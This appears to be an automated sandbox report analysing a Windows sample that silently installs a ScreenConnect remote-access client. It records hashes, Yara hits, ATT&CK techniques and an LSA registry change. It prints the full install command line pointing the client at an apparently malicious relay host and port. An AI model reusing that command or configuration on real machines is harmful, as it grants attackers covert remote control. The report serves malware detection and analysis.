                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsExtensions.cs | Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                              Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&c=traffic%20test&c=&c=&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr | Binary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr | Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Code function: 8_2_055B1868 CreateNamedPipeW,8_2_055B1868
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | Code function: 8_2_013B4D30 RtlGetVersion,8_2_013B4D30
                              Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Lowering of HIPS / PFW / Operating System Security Settings

                              Source: C:\Windows\System32\msiexec.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                              Source: Yara match | File source: file.exe, type: SAMPLE
                              Source: Yara match | File source: 9.2.ScreenConnect.WindowsClient.exe.2c6fa28.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 9.0.ScreenConnect.WindowsClient.exe.950000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.2.file.exe.5af0000.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.2.file.exe.5af0000.8.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.0.file.exe.ad5db8.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 10.2.ScreenConnect.WindowsClient.exe.314fa60.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.0.file.exe.a263d8.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.0.file.exe.aac3d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 0.0.file.exe.a10000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000000.00000002.2163119833.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000000.00000002.2155397067.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: file.exe PID: 6516, type: MEMORYSTR
                              Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 716, type: MEMORYSTR
                              Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4180, type: MEMORYSTR
                              Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6196, type: MEMORYSTR
                              Source: Yara match | File source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara match | File source: C:\Config.Msi\5de52c.rbs, type: DROPPED
                              Source: Yara match | File source: C:\Windows\Installer\MSIE7CB.tmp, type: DROPPED
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                              Process Injection
                              1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              [Behavior graph] ID: 1557086 | Sample: file.exe | Startdate: 17/11/2024 | Architecture: WINDOWS | Score: 48

                              Source | Detection | Scanner | Label
                              file.exe | 26% | Virustotal |

                              Source | Detection | Scanner | Label
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll | 0% | Virustotal |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll | 0% | Virustotal |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe | 3% | Virustotal |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs |
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs |
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp | 0% | ReversingLabs |
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs |
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs |
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs |
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs |
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs |
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs |
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs |
                              C:\Windows\Installer\MSIE7EB.tmp | 0% | ReversingLabs |
                              C:\Windows\Installer\MSIEC9F.tmp | 0% | ReversingLabs |

                              No Antivirus matches

                              Source | Detection | Scanner | Label
                              kasin22.zapto.org | 0% | Virustotal |
                              No Antivirus matches
                              Name | IP | Active | Malicious | Antivirus Detection | Reputation
                              kasin22.zapto.org | 194.59.30.222 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://wixtoolset.org/releases/ | rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr | false | | high
http://wixtoolset.org/news/ | rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ScreenConnect.ClientService.exe, 00000008.00000002.3393549461.0000000001CB3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v | rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr | false | | high
https://feedback.screenconnect.com/Feedback.axd | ScreenConnect.Core.dll.3.dr | false | | high
https://docs.rs/getrandom#nodejs-es-module-support | ScreenConnect.WindowsCredentialProvider.dll.3.dr | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
194.59.30.222 | kasin22.zapto.org | Germany | | 30823 | COMBAHTONcombahtonGmbHDE | true
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1557086
                                          Start date and time:2024-11-17 10:31:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 10s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:16
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:file.exe
                                          Detection:MAL
                                          Classification:mal48.evad.winEXE@17/56@1/1
                                          EGA Information:
                                          • Successful, ratio: 60%
                                          HCA Information:
                                          • Successful, ratio: 73%
                                          • Number of executed functions: 487
                                          • Number of non-executed functions: 3
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target file.exe, PID 6516 because it is empty
                                          • Execution Graph export aborted for target rundll32.exe, PID 716 because it is empty
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          No simulations
                                          No context
                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
COMBAHTONcombahtonGmbHDE | DEMASI-24-12B DOC. SCAN.exe | | malicious | GuLoader, Remcos | | 194.59.31.40
 | Orden de Noviembre.com.exe | | malicious | AsyncRAT | | 194.59.31.47
 | monthly-eStatementForum120478962.Client.exe | | malicious | ScreenConnect Tool | | 194.59.30.201
 | monthly-eStatementForum120478962.Client.exe | | malicious | ScreenConnect Tool | | 194.59.30.201
 | 0jg24sHn9q.exe | | malicious | Remcos | | 194.59.31.120
 | VDsZYqbfHI.exe | | malicious | ScreenConnect Tool | | 194.59.31.9
 | 2siOtP5z21.exe | | malicious | ScreenConnect Tool | | 194.59.31.9
 | 7uihPKvK0C.exe | | malicious | ScreenConnect Tool | | 194.59.31.9
 | VDsZYqbfHI.exe | | malicious | ScreenConnect Tool | | 194.59.31.9
 | 1bNQ03YM1i.exe | | malicious | ScreenConnect Tool | | 194.59.31.9
                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll | setup.msi | | malicious | ScreenConnect Tool | |
 | monthly-eStatementForum120478962.Client.exe | | malicious | ScreenConnect Tool | |
 | monthly-eStatementForum120478962.Client.exe | | malicious | ScreenConnect Tool | |
 | pzPO97QouM.exe | | malicious | ScreenConnect Tool | |
 | pzPO97QouM.exe | | malicious | ScreenConnect Tool | |
 | statments.exe | | malicious | ScreenConnect Tool | |
 | Scanned01Document_ms.exe | | malicious | ScreenConnect Tool | |
 | Scanned01Document_ms.exe | | malicious | ScreenConnect Tool | |
 | sstatment.exe | | malicious | ScreenConnect Tool | |
 | extukGiBrn.exe | | malicious | ScreenConnect Tool | |
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):219658
                                                              Entropy (8bit):6.583563814033734
                                                              Encrypted:false
                                                              SSDEEP:3072:ej9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGWT:ejuH2aCGw1ST1wQLdqvWT
                                                              MD5:8727F5F38D750CF471F5C80A51120FD7
                                                              SHA1:5CF2EFB747916C94944EDDF00B5E01343B1EEDF4
                                                              SHA-256:C3AB9B34E27DDF3133393BE0C18B512D86D05B4F6B4D99AC80307ECD32FCFE68
                                                              SHA-512:D97D01F5D45F47E33A87B3C4A99F8135F19AB9E2A0A988A7672815BA778646A76800017816F0A05FE1FE09366D0214A994D41DF8ADBF7163A0BDB4FC6B1AB0AC
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\5de52c.rbs, Author: Joe Security
                                                              Reputation:low
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):227
                                                              Entropy (8bit):4.836043831200555
                                                              Encrypted:false
                                                              SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsl:rHy2DLI4MWoj12K9cAul
                                                              MD5:DFD0BDFF874BB29B508F15BDD35CB6A3
                                                              SHA1:DE772D64129E084D150D8087CCDAC16EF97FB185
                                                              SHA-256:38BDCC2EC25E7464DDE7293B5A6EC64EEA4B9D9F6FB8C36FDCC5677A6F55B721
                                                              SHA-512:6ADDFAE10478871085C796F2AF5A11CD78088FC49B245DF2229DB7546973FF9A16785C72BF61F569E16A3E79F7F48EF8C1BADB91313271D9515AF3D3B4B759B0
                                                              Malicious:false
                                                              Reputation:low
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):13217
                                                              Entropy (8bit):5.573331139429914
                                                              Encrypted:false
                                                              SSDEEP:96:r5KNK/KkVU4MdLEbxw2vWeqcy/zrqr7syJcAYswQ7ELOq76igQbBvNJpfkyBw/F+:r8EvnkrIAdD7tPbDLovvvLqHCKS/bjB8
                                                              MD5:3E2AAEB2CEA70C3508085356777FAF2E
                                                              SHA1:AAA701D78F61B061CE143FC32FB73A4809F1A665
                                                              SHA-256:C0350217C247E02BC32838FDD89EC3ED25BDC0B995C0FBAE99A169A07989662D
                                                              SHA-512:840BBF782E1956EAAA99304B5C7F17A9003DA4844BCE03FC27C493A187CF1E19D28333F6919816B43352C408047E963AD1C21A242AA85716746F200E57342DD7
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):50133
                                                              Entropy (8bit):4.759054454534641
                                                              Encrypted:false
                                                              SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                              MD5:D524E8E6FD04B097F0401B2B668DB303
                                                              SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                              SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                              SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):26722
                                                              Entropy (8bit):7.7401940386372345
                                                              Encrypted:false
                                                              SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                              MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                              SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                              SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                              SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):197120
                                                              Entropy (8bit):6.58476728626163
                                                              Encrypted:false
                                                              SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                              MD5:AE0E6EBA123683A59CAE340C894260E9
                                                              SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                              SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
